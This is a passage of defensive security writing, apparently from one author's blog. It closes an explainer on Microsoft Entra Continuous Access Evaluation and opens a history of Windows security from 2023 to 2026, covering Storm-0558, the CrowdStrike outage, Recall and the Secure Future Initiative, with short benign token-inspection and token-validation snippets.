Capability declaration. The app registration must declare xms_cc with value ["cp1"] (lowercase is the canonical token-claim form; uppercase "CP1" also works because negotiation is case-insensitive). This is the wire-level signal to Entra that the client can handle a CAE-aware token and the claims challenge that comes with it.
Claims-challenge handling. MSAL helpers do this transparently in current SDK versions, but custom HTTP pipelines that bypass MSAL must implement the WWW-Authenticate: Bearer error="insufficient_claims" response handler manually. Decode the claims parameter (base64url), pass it to AcquireTokenInteractive or the equivalent, retry the original request with the new token.
End-to-end test. Trigger an admin password reset against a test user in a non-production tenant and verify that the next API call from a signed-in MSAL session surfaces the claims challenge and recovers cleanly. This is the single most useful confidence test; it exercises every layer of the protocol in one round trip.

{` // Illustrative: inspect an MSAL JS token-cache entry for the xms_cc capability // marker. In real apps, MSAL handles capability negotiation; this is for // educational inspection only.

// A real-shape AccessTokenEntity from MSAL JS cache const tokenEntity = { homeAccountId: 'abc.def-tenant', environment: 'login.microsoftonline.com', credentialType: 'AccessToken', clientId: '11111111-2222-3333-4444-555555555555', tenantId: 'tenant-id', target: 'User.Read Mail.Read', // expiresOn is up to ~28 hours after cachedAt for CAE-aware sessions cachedAt: '1748534400', expiresOn: '1748635200', // 28h later extendedExpiresOn: '1748635200', // Capability declaration the app advertised at acquisition time requestedClaims: { xms_cc: ['cp1'] } };

const ttlSeconds = parseInt(tokenEntity.expiresOn) - parseInt(tokenEntity.cachedAt); const ttlHours = ttlSeconds / 3600; const isCaeAware = tokenEntity.requestedClaims && tokenEntity.requestedClaims.xms_cc && tokenEntity.requestedClaims.xms_cc .some(c => c.toLowerCase() === 'cp1');

console.log('TTL hours:', ttlHours.toFixed(1)); console.log('CAE-aware:', isCaeAware); // TTL hours: 28.0 // CAE-aware: true // A TTL above ~1 hour with xms_cc cp1 is a strong indicator the session is // CAE-aware and Entra issued an extended-lifetime token. `}

For the custom-API author

This is the hardest path. To make a custom protected API a CAE-aware resource provider today, the first-party Microsoft pathway is not publicly available -- the CAE participation contract for the M365 productivity workloads is internal to Microsoft. The community-canonical implementation pattern is Damien Bowden's damienbod/AspNetCoreMeIDCAE reference repository on GitHub [@damienbod-aspnetcoremeidcae], with an accompanying blog post walkthrough [@damienbod-blog-2022-04]. The repository (initial version April 3, 2022; updated through .NET 10 in late 2025) demonstrates:

The xms_cc=cp1 capability declaration on both the client and the API app registrations.
The Microsoft.Identity.Web claims-challenge handling on the API side.
The Razor Page client flow that catches a 401 with the challenge header and re-acquires the token.

For a fully standards-track pathway, the same custom API can be built as an OpenID SSF receiver consuming CAEP events from any SSF-compliant transmitter, using the RFC 8417 SET envelope over the RFC 8935 push transport [@rfc-8417; @rfc-8935]. Production-grade SSF receiver code is now available in commercial CAEP Hub products (SGNL, TigerIdentity) and a growing set of open-source libraries.

Note: CAE itself does not require add-on licensing for the basic critical-event evaluation across Microsoft 365 -- it is part of the Entra ID baseline for new tenants. The Microsoft Entra ID Protection feed that drives high user risk detected events, however, requires Microsoft Entra ID P2 (or an equivalent SKU that includes Identity Protection). Confirm current licensing terms in the Microsoft licensing documentation before making procurement decisions; the lower SKUs cover four of the five critical events but not the risk-based one [@ms-cae-concept].

Observability

Sign-in logs and audit logs are where CAE behavior shows up. Look for:

Sign-in logs: filter by signInEventTypes containing CAE-related entries. CAE-aware sign-ins have a different telemetry shape than non-CAE sign-ins.
Token-issuance events: refresh-token issuance against CAE-aware app registrations should show the extended lifetime.
Audit log revocation entries: administrator revocation actions and Identity-Protection-driven revocations appear here; cross-correlate with the resource-provider-side telemetry to validate end-to-end propagation.

Use Microsoft Graph PowerShell to enumerate the tenant's CAE configuration and then trigger a synthetic test: 1) read `Get-MgIdentityConditionalAccessPolicy` to verify the relevant CA policies have CAE enabled in their `SessionControls.ContinuousAccessEvaluation` block; 2) create a test user, sign them in via Outlook on the Web; 3) reset their password via `Update-MgUser`; 4) observe in the audit log that the password reset propagates to a CAE event, and verify in Outlook on the Web that the next refresh surfaces a re-authentication prompt within the 15-minute SLA. This is the simplest end-to-end confidence test that does not require modifying any production resource.

Defaults are good

The most common engineering recommendation here is to leave the defaults alone. CAE on, default tenant settings, current MSAL clients, xms_cc=cp1 on every new app registration. The configuration surface area is small precisely because the design is right: there are not many knobs to turn. The work is in confirming that the client and RP combinations your users actually exercise are CAE-aware, and in monitoring the audit logs to catch drift.

That is what to do. The last section is what to remember -- the misconceptions every team carries into a CAE conversation, and the answers that close them.

11. FAQ and Coda

No. The published SLA is up to 15 minutes for the five critical events; only IP-location enforcement is instant. See Section 6 for the mechanical reason for the asymmetry and Section 8 Limit 2 for why 15 minutes is engineering economics rather than a fundamental limit [@ms-cae-concept]. No. CAE addresses *stale authorization* (the original authorization decision is no longer correct), not *stolen tokens* (an attacker is presenting a token that was legitimately issued to someone else). For token theft, use a sender-constrained-token construction: DPoP per RFC 9449 [@rfc-9449-dpop] or mTLS-bound tokens per RFC 8705 [@rfc-8705-mtls]. Both compose cleanly with CAE; a DPoP-bound CAE-aware token is the strongest commonly-deployed combination today, closing both the replay attack surface and the stale-authorization gap. No. SSF 1.0, CAEP 1.0, and RISC 1.0 were approved as OpenID Foundation Final Specifications on September 2, 2025 -- see Section 4 for the standards-stack treatment [@openid-three-final-specs]. No. MDE and Intune are signal sources into Conditional Access, not CAE-consuming resource providers; see the Section 6 Common-misconception callout for the full distinction and the CAE-aware RP set [@ms-cae-concept]. *Not when the resource provider is CAE-aware.* The token lifetime stops carrying the revocation weight; the channel does. A CAE-aware RP can revoke a 28-hour token within 15 minutes of a critical event, which is a strictly better revocation profile than a 1-hour token with no channel (revocable only at the 1-hour expiry boundary in the worst case) [@ms-cae-concept]. *Yes*, however, when the RP is *not* CAE-aware: the token then carries its full lifetime as the revocation window, and longer is worse. The architectural rule: only issue extended-lifetime tokens to clients whose RPs are CAE-aware -- which is exactly what the `xms_cc=cp1` capability negotiation enforces [@ms-cae-app-resilience]. No. CAE is specific to OAuth 2.0 and OpenID Connect access tokens. SAML assertions have their own lifetime and replay-protection model and are not in scope for the CAE participation contract or for the OpenID SSF/CAEP profiles [@ms-cae-concept; @openid-caep-1_0]. If you are still operating SAML-fronted workloads, the analogous design problem (revocation between sign-in and assertion expiry) is solved differently and is largely a per-product implementation question rather than a standards story.

Coda: the bargain

The OAuth 2.0 designers in 2012 took a deliberate trade: short-lived self-contained tokens were the price they paid to escape the WAM bottleneck. The trade was correct for the web they were designing for. It became wrong the moment enterprises ran compliance-bound SaaS at scale on top of those tokens. Three obvious patches were tried -- the /revoke endpoint, the /introspect endpoint, the short-lifetime experiment -- and each failed for a distinct reason: the wrong party initiates revocation; the AS becomes a per-request critical path; expiry as a blunt instrument creates load and reliability problems while still leaving a window.

What replaced them was an architecture that took two facts seriously. First, revocation has to be push from the IdP to the RP -- not pull from RP to AS, not client-initiated POST to /revoke. Second, expiry and revocation can be separated: once the channel handles revocation, expiry can be measured in days rather than minutes. The 15-minute critical-event SLA and the up-to-28-hour token lifetime are two halves of the same bargain. Microsoft Entra ships them together because they only work together; the OpenID Foundation has standardized the same pattern across vendors because the long tail of SaaS faces the same problem.

The architecture is settled; the adoption is in progress. The CAEP, SSF, and RISC Final Specifications give every SaaS vendor a tractable target. The Microsoft 365 estate is already covered. Cross-vendor receiver coverage is the metric that will decide how much of the 2026 enterprise identity surface actually inherits the bargain -- and that, more than any further protocol work, is the story to watch over the next several years.

The Layer Above the OS: The Windows Security Wars Part 6 (2023-2026)

noreply@paragmali.com (Parag Mali) — Sat, 30 May 2026 00:00:00 GMT

**Three failures. Three soft layers. One era.** Between 2023 and 2026, Microsoft publicly admitted that the largest attack surface on a modern Windows machine is no longer the OS itself -- it is the third-party kernel-mode security vendor, the institution's own identity-token custody, and the AI feature plane sitting on top of both.

Storm-0558 forged enterprise Exchange tokens with a 2016 consumer signing key. CrowdStrike's July 19, 2024 outage bricked roughly 8.5 million Windows hosts in ninety minutes -- no attacker, no exploit, just twenty bytes of bad data in a sanctioned kernel driver. The Recall saga proved that VBS, TPM, and DPAPI do not know how to enforce policy on what an AI agent decides to do next.

Microsoft's reply is the Secure Future Initiative, the Windows Endpoint Security Platform, and the April 14, 2026 Cross-Signing trust deprecation -- the first sustained engineering re-architecture of all three soft spots in parallel. Whether the response lands before the 2026 ransomware wave is the open forward question.

1. Twenty Bytes at 04:09 UTC

At 04:09 UTC on July 19, 2024, a CrowdStrike Falcon sensor running on roughly 8.5 million Windows hosts pulled a routine Rapid Response Content update [@ms-weston-jul20-2024] -- Channel File 291, twenty-one input fields where the in-kernel Content Interpreter expected twenty, the twenty-first treated as an address the kernel was never meant to follow [@crowdstrike-rca-pdf] -- and the world's airline desks, hospital admissions systems, and emergency dispatch terminals began the bluest morning in the history of the NT kernel. No attacker was involved. No exploit ran. A non-malicious data-parsing defect inside a sanctioned, signed, kernel-mode third-party security driver took down a sovereign country's flight network in ninety minutes [@ms-jul27-2024-security-tools] because the operating system, twenty-five years earlier, had agreed to let security vendors run there [@theregister-2006-vista].

Three months before that morning, the United States Cyber Safety Review Board had published a different verdict on a different vendor failure. Its review of the summer 2023 Microsoft Exchange Online intrusion -- the Storm-0558 episode in which a Chinese threat actor forged Outlook tokens against enterprise Exchange Online using a 2016 consumer-tier Microsoft Account signing key -- concluded that the breach was "preventable and should never have occurred" and that "Microsoft's security culture was inadequate and requires an overhaul" [@csrb-2024]. The CSRB had only reviewed two prior incidents [@dhs-press-2024]; the third reviewed company was the steward of the world's most widely deployed operating system.

Ten weeks after the Storm-0558 verdict, on June 13, 2024, Microsoft's group product manager for Windows quietly added an in-place editor's note to a blog post he had published six days earlier. The note pulled the company's flagship Copilot+ PC AI feature, Recall, from a planned ship date of June 18, 2024 -- five days before launch -- and shifted it to the Windows Insider Program [@recall-davuluri-jun7-2024].

Note: This is the sixth installment of The Windows Security Wars. Earlier parts walked BitLocker, Credential Guard, VBS, Pluton, and the Defender-and-WDAC arc that produced the modern Windows security baseline. This part picks up where Part 5 left off and argues that the era's actual story is what happens above that baseline.

Three failures, three soft layers, one era -- and the 2023-2026 chapter is the first in NT's history in which the layer above the OS (the institution's own identity-token custody, the third-party kernel-mode security vendor, and the AI feature application plane) became the load-bearing security boundary under public scrutiny while the OS layer itself kept hardening. David Weston's July 20, 2024 post framed the 8.5 million figure as "less than one percent of all Windows machines" [@ms-weston-jul20-2024]. The number itself is sourced from Windows Error Reporting crash dumps and customer telemetry, so machines stuck in a boot loop with no network or with WER disabled are not counted; treat it as a credible lower bound rather than a full census [@wiki-crowdstrike-outage]. The framing is correct and worth holding onto: this is a story about which 1% mattered, not about the platform's defect rate. To see why that is an architectural inflection rather than a coincidence of three bad years, we have to walk the prior arcs the three events belong to.

2. Three Lineages Converging

The era did not begin in June 2023. Three long-running arcs converged on the 2023-2026 chapter, and each event in the opening is the latest generation of one of them.

Lineage 1: Identity-authority forgery

The first lineage is the oldest. In 1997, a researcher known as Hobbit, distributing through the Avian Research mailing list, documented that Windows CIFS authentication could be replayed with the password hash rather than the password itself. Microsoft's own Mitigating Pass-the-Hash and Other Credential Theft whitepaper, in its 2014 second edition, treats the Hobbit observation as the foundational primitive for the entire credential-theft family [@ms-pth-whitepaper]. In 2014, Benjamin Delpy stood up at Black Hat USA and demonstrated that the Active Directory KRBTGT account's long-lived signing key, once stolen, let an attacker mint Kerberos tickets for any user, including domain administrators -- the "Golden Ticket" attack, packaged into the mimikatz toolchain [@delpy-bh-slides] [@mimikatz-github]. In 2017, CyberArk's Shaked Reiner extended the same idea to SAML identity providers: steal the IdP's signing certificate and mint cross-application tokens at will [@cyberark-golden-saml]. In December 2020, FireEye and Microsoft together disclosed that a sophisticated nation-state actor had compromised the upstream SolarWinds build process and minted trusted certificates with that compromise [@mandiant-fireeye] [@msrc-solarwinds-2020].

In June 2023, Storm-0558 widened the trust domain again. The forged tokens were signed by a consumer-tier Microsoft Account key issued in April 2016 [@wiz-storm0558], but the tokens worked against enterprise Exchange Online inboxes [@mstic-storm0558-jul14-2023]. Each generation of this lineage widens the issuer domain by one level: from one user's hash, to one directory's ticket-signing key, to one IdP's SAML key, to one supply chain's signing certificate, to one cloud provider's consumer signing key crossing into its enterprise trust boundary.

flowchart LR A["1997: Pass-the-Hash, Hobbit"] --> B["2014: Golden Ticket, Delpy"] B --> C["2017: Golden SAML, Reiner"] C --> D["2020: Sunburst supply chain, FireEye and Microsoft"] D --> E["2023: Storm-0558 cross-tier MSA key"]

Lineage 2: Third-party AV in the kernel

The second lineage runs in parallel. In the late 1990s, anti-virus drivers on Windows NT loaded unsigned and hooked the kernel directly through the System Service Descriptor Table. PatchGuard arrived first, shipping in April 2005 with Windows XP Professional x64 Edition and Windows Server 2003 SP1 x64; it policed the integrity of protected kernel structures so SSDT hooking could no longer survive [@patchguard-2005-history]. Eighteen months later, Vista x64 made Kernel-Mode Code Signing (KMCS) mandatory: every kernel driver now had to chain to a trusted Authenticode certificate [@kmcs-policy-docs] [@msrc-vista-2005-kernelmode]. The combined effect landed at scale with Vista x64, because that was the release in which unsigned x64 kernel code stopped loading by default.

The Windows policy, introduced with x64 editions of Vista, that requires every kernel-mode driver to be signed by a certificate chaining to a Microsoft-trusted root. The Cross-Signing Program let third-party certificate authorities issue compatible certificates; the Windows Hardware Compatibility Program (WHCP) is the modern submission path.

The AV industry pushed back. McAfee, Symantec, and Kaspersky argued publicly through 2006-2009 that PatchGuard amounted to an antitrust violation, since Microsoft's own Defender ran where they were now locked out [@theregister-2006-vista] [@msnews-2006-collab]. The EU-mediated settlement that followed produced the substrate of what eventually became the Microsoft Virus Initiative (MVI) -- a sanctioned set of kernel-access patterns and APIs that third-party AV vendors could use [@mvi-criteria].

Microsoft's program for vetting third-party endpoint security vendors that ship code into Windows. Membership requires meeting Microsoft-defined product and testing criteria. MVI is the institutional residue of the 2006-2009 antitrust settlement that produced today's third-party-AV-in-kernel model.

By the early 2020s, the visible failure mode of the kernel-resident AV class had become BYOVD ("bring your own vulnerable driver") attacks, in which an attacker loaded a signed-but-buggy legitimate driver as a privilege-escalation primitive. Microsoft's response was the Vulnerable Driver Blocklist, default-on in Windows 11 22H2 [@driver-block-rules]. That settled the malicious-vendor case. It did not settle the failure mode CrowdStrike would demonstrate in 2024.

Lineage 3: AI as a security boundary

The third lineage is the youngest. Windows Hello, launched with Windows 10 in 2015, was the first widely deployed Windows feature whose security decisions depended on a statistical classifier -- the biometric matcher that decided whether the face in front of the camera matched the enrolled template [@hello-for-business]. Defender's machine-learning detection components and Edge's SmartScreen reputation engine extended the same pattern through 2017-2020: statistical scoring as one input to a security decision. Microsoft 365 Copilot, launched in 2023, moved the statistical surface deeper into the trust model by letting an LLM execute actions on a user's behalf inside the tenant.

On May 20, 2024, the Copilot+ PC class moved the statistical surface onto the local device with a programmable NPU and a flagship feature, Recall, designed to take screenshots of everything on screen and index them for semantic search [@copilot-pcs-may-20]. Recall would force the question the prior generation had merely circled: is the AI agent's judgment a security boundary, and if so, what enforces it?

All three lineages reach their newest soft layer in the same three-year window. The next question is whether each soft layer was equally well defended on the morning of June 15, 2023 -- the morning the United States State Department's GCC-High security operations center pulled the audit-log query that flagged the Storm-0558 token misuse [@csrb-2024].

3. Pre-CSRB Posture and Storm-0558

On the morning of June 15, 2023, Microsoft's security posture looked complete. A decade of methodical work had pushed the platform's boundary primitives downward and outward: BitLocker, Credential Guard, VBS, HVCI, Pluton; Smart App Control; Continuous Access Evaluation; Defender for Endpoint as a managed cloud service. The operating assumption was that the platform was the boundary worth defending and that the institution sat above the boundary as a trusted operator. By the close of business that day, the assumption was wrong, and the State Department's GCC-High SOC was about to be the first organization on the planet to find out. Per the CSRB report (page 11), Microsoft was notified on June 16, 2023 [@csrb-2024].

The Storm-0558 forgery primitive worked because four independent decisions, each defensible in isolation, had aligned across six years.

The four pre-conditions

The first pre-condition was an unrotated 2016 MSA consumer signing key. Wiz Research's reconstruction of the published JWKS history shows the certificate was issued April 5, 2016 and expired April 4, 2021; the key continued to be trusted by at least one Outlook Web Access validator after expiry [@wiz-storm0558].

The second pre-condition was software-resident custody at the moment of key acquisition. The MSA signing service was not in a hardware security module at the time; only after the April 2025 Secure Future Initiative progress report did Microsoft confirm that MSA and Entra ID signing keys had been moved to hardware-backed security modules with automatic rotation and that the MSA signing service itself had been migrated to Azure Confidential VMs [@sfi-apr-2025].

The third pre-condition was a converged OWA token validator that accepted tokens signed by either MSA or Entra ID issuers. The September 2018 metadata-endpoint convergence had been a developer-experience decision that worked correctly; the failure was a later OWA migration onto that endpoint without adding the cross-tier guard.

The fourth was a missing issuer and audience check on the OWA validation path. Microsoft's September 6, 2023 root cause statement, later edited in place on March 12, 2024, is unambiguous: "developers in the mail system incorrectly assumed libraries performed complete validation and did not add the required issuer/scope validation" [@msrc-storm0558-key-acq].

flowchart TD A["2016 MSA signing certificate issued"] --> E["Forgery primitive"] B["Software-resident key custody"] --> E C["Converged MSA plus Entra ID validator endpoint"] --> E D["OWA path missing iss and aud validation"] --> E E --> F["Forged tokens accepted by enterprise Exchange Online"]

The combination produced a forgery primitive that worked at nation-state scale. The CSRB tallied the victims: 22 enterprise organizations, approximately 503 personal accounts, and roughly 60,000 emails from State Department accounts [@csrb-2024]. The CSRB's April 2, 2024 verdict, on page ii of the public report, is the load-bearing sentence of the era and is reproduced verbatim in the PullQuote below [@csrb-2024]. The report was the third the Board had completed since its February 2022 announcement [@dhs-press-2024]; the prior two had reviewed Log4j and Lapsus$, neither of which was a single-vendor failure of the same kind [@thehackernews-csrb] [@cybersecuritydive-csrb].

A United States public-private review board, modeled loosely on the National Transportation Safety Board, that conducts after-action reviews of consequential cybersecurity incidents. The CSRB has no enforcement authority; its product is a public report with recommendations. The consumer-tier identity tenant that backs personal Outlook, OneDrive, Xbox, and similar consumer services. Its canonical tenant GUID at the OpenID Connect discovery endpoint is `9188040d-6c67-4c5b-b112-36a304b66dad` [@msa-oidc-discovery]. The Storm-0558 forgery primitive used an MSA-issued signing key against an enterprise Exchange Online validator that did not reject the consumer-tier issuer. This intrusion was preventable and should never have occurred... Microsoft's security culture was inadequate and requires an overhaul. -- United States Cyber Safety Review Board, *Review of the Summer 2023 Microsoft Exchange Online Intrusion*, April 2, 2024 [@csrb-2024].

Note: Microsoft's September 6, 2023 post initially hypothesized that the MSA key had been extracted from a 2021 crash dump. On March 12, 2024 Microsoft edited the post in place with a verbatim note: "the actor access may have resulted from a crash dump in 2021, but we have not found a crash dump containing the impacted key material" [@msrc-storm0558-key-acq]. The CSRB report (page 17) is equally explicit: "Microsoft has been unable to determine how or when Storm-0558 obtained the MSA key" [@csrb-2024]. Any account that asserts the crash-dump path as fact is reading a retracted hypothesis as confirmed history.

The validation step Microsoft says was missing on the OWA path is not exotic: RFC 8725, the IETF's JSON Web Token best current practices, treats issuer and audience checks as baseline obligations [@rfc-8725]. The browser-runnable snippet below shows the shape of the check the OWA validator skipped.

{` const consumerTenantGuid = "9188040d-6c67-4c5b-b112-36a304b66dad"; const token = { iss: "login.microsoftonline.com/" + consumerTenantGuid + "/v2.0", aud: "outlook.office.com", sub: "victim@statedept.example", };

function validate(token, expectedIssuer, expectedAudience) { if (token.iss !== expectedIssuer) return "reject: wrong issuer"; if (token.aud !== expectedAudience) return "reject: wrong audience"; return "accept"; }

// What the OWA path should have done for enterprise mailboxes const enterpriseTenantGuid = "your-enterprise-tenant-guid"; const enterpriseIssuer = "login.microsoftonline.com/" + enterpriseTenantGuid + "/v2.0"; console.log(validate(token, enterpriseIssuer, "outlook.office.com")); `}

Storm-0558 was the first half of the proof: the layer above the OS -- Microsoft's own identity-token custody -- is a soft layer. The second half arrived almost exactly one year later, on July 19, 2024. Before walking that morning, we have to walk the institutional response Microsoft launched in the four months between the two events, because the response is what the rest of the article evaluates.

4. Five Threads Across 2023-2026

The 2023-2026 era has five parallel storylines. They have to be walked as concurrent, not sequential, because the era's institutional fact is that all five moved at once and reinforced each other.

4.1 The CSRB and the Secure Future Initiative

Microsoft's response to Storm-0558 began five months before the CSRB ruled the breach preventable and continued for two years after. On November 2, 2023, Microsoft Vice Chair and President Brad Smith published a post on the company's On the Issues blog announcing the Secure Future Initiative (SFI). The original framing had three pillars: AI-based cyber defenses, advances in fundamental software engineering, and advocacy for international norms [@sfi-nov-2023].

Two events between November 2023 and May 2024 forced a reframing. The first was the January 2024 Midnight Blizzard disclosure -- the Russian SVR-linked actor that compromised Microsoft corporate email through a legacy test tenant. The second was the April 2, 2024 CSRB verdict. On May 3, 2024, in an unusual move, Microsoft Chairman and CEO Satya Nadella wrote directly to employees and posted the memo publicly: "I want to talk about something critical to our company's future: prioritizing security above all else... we will commit the entirety of our organization to SFI" [@sfi-may3-2024-nadella]. The Microsoft Security blog technical companion the same day reframed SFI as three principles (Secure by Design, Secure by Default, Secure Operations) and six pillars (Protect Identities and Secrets, Protect Tenants and Isolate Production Systems, Protect Networks, Protect Engineering Systems, Monitor and Detect Threats, Accelerate Response and Remediation) [@sfi-may3-2024-secblog].

On June 13, 2024, in front of the House Committee on Homeland Security, Brad Smith said the sentence that anchors Microsoft's post-CSRB posture: "Microsoft accepts responsibility for each and every one of the issues cited in the CSRB's report. Without equivocation or hesitation. And without any sense of defensiveness" [@smith-house-testimony-jun-2024] [@ms-on-issues-jun-2024].

Microsoft accepts responsibility for each and every one of the issues cited in the CSRB's report. Without equivocation or hesitation. And without any sense of defensiveness. -- Brad Smith, June 13, 2024, before the House Committee on Homeland Security [@smith-house-testimony-jun-2024].

The progress reports that followed quantified the institutional commitment. The September 23, 2024 update is the first to use Microsoft's signature phrase: "we have dedicated the equivalent of 34,000 full-time engineers to SFI -- making it the largest cybersecurity engineering effort in history" [@sfi-sept-2024]. The same post is the first to link senior leadership compensation to security outcomes and to formalize the Cybersecurity Governance Council and Deputy CISO structure. The April 21, 2025 progress report reports that MSA signing keys had been moved to hardware-backed security modules with automatic rotation, the MSA signing service had been migrated to Azure Confidential VMs, and identity-SDK validation for Microsoft's own apps had moved from 73% to 90% [@sfi-apr-2025]. The November 10, 2025 Windows-and-Surface-specific SFI report introduced the Hotpatch metric -- 81% of enrolled devices compliant within 24 hours of Patch Tuesday -- and announced the Rust rewrite of Surface UEFI firmware and Windows drivers, paired with the Open Device Partnership opening those Rust drivers to OEM partners [@sfi-nov-2025-windows].

Microsoft's "34,000 full-time engineers" wording is an FTE-equivalent calculation, not a literal headcount [@sfi-sept-2024]. The April 2025 report rephrases it as "34,000 engineers working full-time for 11 months" [@sfi-apr-2025], which is the same arithmetic in a more honest grammar.

SFI report	Identity-SDK validation	Signing-key custody	Audit-log retention	Hardware and firmware	Employee and exec ties
Nov 2, 2023 [@sfi-nov-2023]	Not yet reported	Pre-Storm-0558 baseline	Pre-incident baseline	Not in scope	Three pillars framing only
Sept 23, 2024 [@sfi-sept-2024]	Reported, no number	Azure Managed HSM with automatic rotation	2-year retention committed	Pluton firmware over OS channel	Senior leadership compensation tied; Cybersecurity Governance Council
Apr 21, 2025 [@sfi-apr-2025]	90% (up from 73%)	MSA service in Azure Confidential VMs; Entra ID migration in progress	2-year retention live	Pluton across all three x86 vendors	Continuing
Nov 10, 2025 [@sfi-nov-2025-windows]	Continuing	Continuing	Continuing	Surface UEFI and Windows drivers in Rust; Open Device Partnership	95% of employees completing AI-attack training

SFI is the first time a platform vendor has publicly tied executive compensation, two years of audit-log retention, the equivalent of 34,000 full-time engineers, a Rust rewrite of UEFI firmware and Windows drivers, and a sustained cross-progress-report measurement program to the explicit premise that the vendor's own security culture is part of the platform's attack surface. That is the institutional half of the thesis.

On the very day Brad Smith's House testimony committed Microsoft to the SFI roadmap, an entirely different soft layer -- one that had nothing to do with identity-token custody -- had already failed quietly. That morning's failure is the second thread.

4.2 Recall as the AI-feature security-review worked example

The second thread arrived from an unexpected direction. On the same June 13, 2024 that Brad Smith committed Microsoft to the SFI roadmap, Microsoft pulled its flagship Copilot+ PC AI feature five days before launch over a structural problem in its own threat model. The feature was Recall. The timeline that followed is the worked example of what post-SFI AI-feature security review looks like under sustained adversarial pressure.

On May 20, 2024, Yusuf Mehdi announced Copilot+ PCs with a 40+ TOPS NPU minimum and Recall as the flagship feature [@copilot-pcs-may-20]. Recall's Generation-1 design was simple: take a screenshot of the user's screen at intervals, extract text and entities with on-device AI, and store the result in an SQLite database protected by AES-128-XTS volume encryption plus filesystem ACLs scoped to the user. The "Recall is not shared with anyone" framing implied a clean trust boundary. It was wrong.

On May 28, 2024, the Swiss researcher Alexander Hagenah (@xaitax) released TotalRecall, a proof-of-concept extractor that walked the SQLite store with the user's own privileges and dumped every snapshot [@totalrecall-github]. Two days later, Kevin Beaumont's DoublePulsar post amplified the threat model into the community's consciousness with the line that defined the news cycle: "Recall enables threat actors to automate scraping everything you have ever looked at within seconds" [@beaumont-doublepulsar] [@helpnetsecurity-totalrecall]. On June 3, 2024, Google Project Zero's James Forshaw published the structural-bound observation that the rest of the Recall story would have to live with: "Spoiler, it is only protected through being ACL'ed to SYSTEM and so any privilege escalation (or non-security boundary cough) is sufficient to leak the information" [@forshaw-acl-jun3-2024]. The parenthetical pointed at Microsoft's own Security Servicing Criteria for Windows, which treats same-user post-authentication as not a security boundary [@msrc-servicing-criteria].

Spoiler, it is only protected through being ACL'ed to SYSTEM and so any privilege escalation (or non-security boundary *cough*) is sufficient to leak the information. -- James Forshaw, Google Project Zero, June 3, 2024 [@forshaw-acl-jun3-2024].

On June 7, 2024, Pavan Davuluri posted a Generation-2 commitment: Recall would be default-off, gated by Windows Hello Enhanced Sign-in Security, and would use just-in-time decryption [@recall-davuluri-jun7-2024]. On June 13, 2024, in an in-place edit to the same post, Davuluri pulled Recall from the planned June 18, 2024 Copilot+ PC ship date and moved it into the Windows Insider Program [@recall-davuluri-jun7-2024]. On September 27, 2024, Davuluri posted the Generation-3 architecture: "Encryption keys are protected via the Trusted Platform Module (TPM), tied to a user's Windows Hello Enhanced Sign-in Security identity, and can only be used by operations within a secure environment called a Virtualization-based Security Enclave (VBS Enclave)" [@recall-davuluri-sept27-2024]. Recall returned to Insiders on November 22, 2024, expanded to AMD and Intel Copilot+ silicon in spring 2025, and reached general availability on May 13, 2025 [@recall-manage-docs].

A user-mode trustlet that runs inside Virtual Trust Level 1 -- the same isolated environment used by Credential Guard and the Secure Kernel -- with an attested code identity, so that code outside the enclave (including a compromised normal-world kernel) cannot read enclave memory [@vbs-enclaves-docs]. Recall's Generation-3 design uses a VBS Enclave to perform decryption with TPM-bound keys gated by Windows Hello ESS [@recall-davuluri-sept27-2024] [@hello-ess-docs]. flowchart LR subgraph G1 ["Generation 1 (May 20, 2024)"] A1["Screenshots"] --> B1["Plaintext SQLite"] B1 --> C1["Filesystem ACL to user"] C1 --> D1["Any user-mode process reads"] end subgraph G3 ["Generation 3 (Sept 27, 2024)"] A3["Screenshots"] --> B3["AES-encrypted snapshot"] B3 --> C3["VBS Enclave decrypts in VTL1"] C3 --> D3["TPM key release"] D3 --> E3["Windows Hello ESS gate"] E3 --> F3["UI plane render"] end

Generation	Key storage	Decrypt gate	Trust boundary	Known public attack	Status
Gen 1 (May 20, 2024)	Software, filesystem ACL	Logon	Same user account	TotalRecall, May 28, 2024 [@totalrecall-github]	Withdrawn
Gen 2 (Jun 7, 2024)	Default-off, just-in-time decrypt	Hello ESS	Same user account	Not shipped	Withdrawn before June 18 [@recall-davuluri-jun7-2024]
Gen 3 (Sept 27, 2024)	TPM-bound, VBS Enclave [@recall-davuluri-sept27-2024]	Hello ESS plus enclave attestation	Enclave with attested identity	TotalRecall Reloaded, April 2026 -- standard-user COM and DLL injection against AIXHost.exe [@itnews-totalrecall-reloaded]	GA May 13, 2025 [@recall-manage-docs]

Recall is *not* the first Microsoft product to ship on VBS Enclaves. SQL Server 2019 Always Encrypted with secure enclaves, generally available November 4, 2019, is the substrate precedent and used the same VTL1 trustlet pattern Recall inherits [@sql-always-encrypted-enclaves]. The correct narrow claim is that Recall is the first VBS-Enclave deployment in the *Windows desktop shell* to face sustained adversarial review by named external researchers.

Note: Both the June 18, 2024 Copilot+ PC ship date and the October 1, 2024 broad-SKU 24H2 RTM date passed without Recall. Recall reached general availability on May 13, 2025 [@recall-manage-docs]. The "24H2 launched with Recall" framing repeated in secondary press is a marketing-cycle compression error; primary sources rule it out.

The April 2026 TotalRecall Reloaded disclosure closed the loop. Hagenah did not attack Recall's encryption, which he described as sound, or the VBS enclave, which he called "rock solid." He attacked the AIXHost.exe process that decrypts and renders the timeline for the user, using a standard-user COM and DLL injection chain. Microsoft determined that the technique "operates within the current, documented security design of Recall" [@itnews-totalrecall-reloaded]. The vault is solid; the delivery truck is, by design, not.

Recall demonstrated that the AI-feature application plane is a third soft layer, distinct from both identity-token custody and third-party kernel drivers. But the most measurable failure of the era did not involve an AI feature, an attacker, or an exploit. It involved twenty bytes.

4.3 CrowdStrike and the road to WESP

The third thread is the load-bearing one. A non-malicious data-parsing bug in a third-party kernel driver -- no attacker involved -- bricked roughly 8.5 million Windows hosts because the OS layer had given that third-party vendor kernel privilege. This is the failure mode the 2006-2009 EU-engagement settlement never stress-tested.

CrowdStrike's August 6, 2024 External Technical Root Cause Analysis names the mechanism precisely. Falcon ships two kinds of detection updates: signed Sensor Content shipped infrequently with the sensor itself, and Rapid Response Content shipped multiple times per day as data files interpreted by an in-kernel Content Interpreter. On July 19, 2024 at 04:09 UTC, CrowdStrike pushed Channel File 291, an IPC Template Instance file used by the Inter-Process Communication template type. The Content Interpreter expected 20 input parameters; the file provided 21. The mismatch produced an out-of-bounds memory read in csagent.sys. The kernel page fault that followed was logged by Microsoft's own incident analysis at nt!KiPageFault+0x369 with a csagent+0xe14ed faulting instruction address [@crowdstrike-rca-pdf] [@crowdstrike-exec-summary] [@ms-jul27-2024-security-tools].

